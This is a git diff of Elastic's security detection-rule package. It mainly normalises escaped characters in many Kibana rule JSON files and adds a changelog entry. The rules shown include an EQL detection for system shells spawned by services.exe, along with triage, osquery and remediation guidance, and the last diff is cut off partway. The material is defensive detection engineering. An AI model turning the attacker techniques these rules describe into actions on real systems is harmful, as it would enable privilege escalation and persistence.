diff --git a/packages/security_detection_engine/changelog.yml b/packages/security_detection_engine/changelog.yml
index 7f2d4db037e..46ea2aa5948 100644
--- a/packages/security_detection_engine/changelog.yml
+++ b/packages/security_detection_engine/changelog.yml
@@ -1,5 +1,10 @@
 # newer versions go on top
 # NOTE: please use pre-release versions (e.g. -beta.0) until a package is ready for production
+- version: 8.12.1-beta.1
+ changes:
+ - description: Release security rules update
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/8714
 - version: 8.11.4
 changes:
 - description: Release security rules update
diff --git a/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_102.json b/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_102.json
index 2298729561c..d922e06ae36 100644
--- a/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_102.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_103.json b/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_103.json
index 6ac478874af..e47afea8894 100644
--- a/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_103.json
@@ -52,7 +52,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_104.json b/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_104.json
index f78e4205b3b..240ca5fd19d 100644
--- a/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_104.json
@@ -52,7 +52,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_105.json b/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_105.json
index e269ccf5f95..12f30051a79 100644
--- a/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_105.json
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_106.json b/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_106.json
index 0c011bbd916..24decf1db1f 100644
--- a/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_106.json
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_207.json b/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_207.json
index 831f6d88925..9a13c9844fd 100644
--- a/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_207.json
+++ b/packages/security_detection_engine/kibana/security_rule/000047bb-b27a-47ec-8b62-ef1a5d2c9e19_207.json
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_105.json b/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_105.json
index ab80214cd6e..68c72af004d 100644
--- a/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_105.json
@@ -68,7 +68,7 @@
 ],
 "risk_score": 73,
 "rule_id": "00140285-b827-4aee-aa09-8113f58a08f3",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -81,7 +81,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_106.json b/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_106.json
index 887b4c8e37f..3cc907dba4e 100644
--- a/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_106.json
@@ -69,7 +69,7 @@
 ],
 "risk_score": 73,
 "rule_id": "00140285-b827-4aee-aa09-8113f58a08f3",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -82,7 +82,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_107.json b/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_107.json
index 1e1a787224c..e4471b5cef7 100644
--- a/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_107.json
@@ -69,7 +69,7 @@
 ],
 "risk_score": 73,
 "rule_id": "00140285-b827-4aee-aa09-8113f58a08f3",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -81,7 +81,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_108.json b/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_108.json
index 7e461f17a35..bde304020fa 100644
--- a/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_108.json
@@ -69,7 +69,7 @@
 ],
 "risk_score": 73,
 "rule_id": "00140285-b827-4aee-aa09-8113f58a08f3",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -82,7 +82,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_109.json b/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_109.json
index eea64d069c8..12bfd95aec0 100644
--- a/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_109.json
+++ b/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_109.json
@@ -69,7 +69,7 @@
 ],
 "risk_score": 73,
 "rule_id": "00140285-b827-4aee-aa09-8113f58a08f3",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -83,7 +83,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -110,7 +110,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_110.json b/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_110.json
index 55ba0d2cb7d..205251681d7 100644
--- a/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_110.json
+++ b/packages/security_detection_engine/kibana/security_rule/00140285-b827-4aee-aa09-8113f58a08f3_110.json
@@ -69,7 +69,7 @@
 ],
 "risk_score": 73,
 "rule_id": "00140285-b827-4aee-aa09-8113f58a08f3",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -83,7 +83,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -110,7 +110,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_104.json b/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_104.json
index 197b450cab6..98a31a6892f 100644
--- a/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_104.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 47,
 "rule_id": "0022d47d-39c7-4f69-a232-4fe9dc7a3acd",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_105.json b/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_105.json
index 03dc5a4ca6d..ba54d8bd188 100644
--- a/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_105.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "System Shells via Services", - "note": "## Triage and analysis\n\n### Investigating System Shells via Services\n\nAttackers may configure existing services or create new ones to execute system shells to elevate their privileges from administrator to SYSTEM. They can also configure services to execute these shells with persistence payloads.\n\nThis rule looks for system shells being spawned by `services.exe`, which is compatible with the above behavior.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. 
Look for registry changes events or Windows events related to service activities (for example, 4697 and/or 7045).\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check for commands executed under the spawned shell.\n\n### False positive analysis\n\n- This activity should not happen legitimately. 
The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating System Shells via Services\n\nAttackers may configure existing services or create new ones to execute system shells to elevate their privileges from administrator to SYSTEM. They can also configure services to execute these shells with persistence payloads.\n\nThis rule looks for system shells being spawned by `services.exe`, which is compatible with the above behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. Look for registry changes events or Windows events related to service activities (for example, 4697 and/or 7045).\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the 
environment by looking for similar occurrences across hosts.\n- Check for commands executed under the spawned shell.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"services.exe\" and\n process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and\n\n /* Third party FP's */\n not process.args : \"NVDisplay.ContainerLocalSystem\"\n", "related_integrations": [ { @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_106.json b/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_106.json
index 38cc2f533f5..896494546bc 100644
--- a/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_106.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "System Shells via Services", - "note": "## Triage and analysis\n\n### Investigating System Shells via Services\n\nAttackers may configure existing services or create new ones to execute system shells to elevate their privileges from administrator to SYSTEM. They can also configure services to execute these shells with persistence payloads.\n\nThis rule looks for system shells being spawned by `services.exe`, which is compatible with the above behavior.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. 
Look for registry changes events or Windows events related to service activities (for example, 4697 and/or 7045).\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check for commands executed under the spawned shell.\n\n### False positive analysis\n\n- This activity should not happen legitimately. 
The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating System Shells via Services\n\nAttackers may configure existing services or create new ones to execute system shells to elevate their privileges from administrator to SYSTEM. They can also configure services to execute these shells with persistence payloads.\n\nThis rule looks for system shells being spawned by `services.exe`, which is compatible with the above behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. Look for registry changes events or Windows events related to service activities (for example, 4697 and/or 7045).\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the 
environment by looking for similar occurrences across hosts.\n- Check for commands executed under the spawned shell.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"services.exe\" and\n process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and\n\n /* Third party FP's */\n not process.args : \"NVDisplay.ContainerLocalSystem\"\n", "related_integrations": [ { @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_107.json b/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_107.json
index 06b98274fa9..7bc2cab29a0 100644
--- a/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/0022d47d-39c7-4f69-a232-4fe9dc7a3acd_107.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "System Shells via Services", - "note": "## Triage and analysis\n\n### Investigating System Shells via Services\n\nAttackers may configure existing services or create new ones to execute system shells to elevate their privileges from administrator to SYSTEM. They can also configure services to execute these shells with persistence payloads.\n\nThis rule looks for system shells being spawned by `services.exe`, which is compatible with the above behavior.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. 
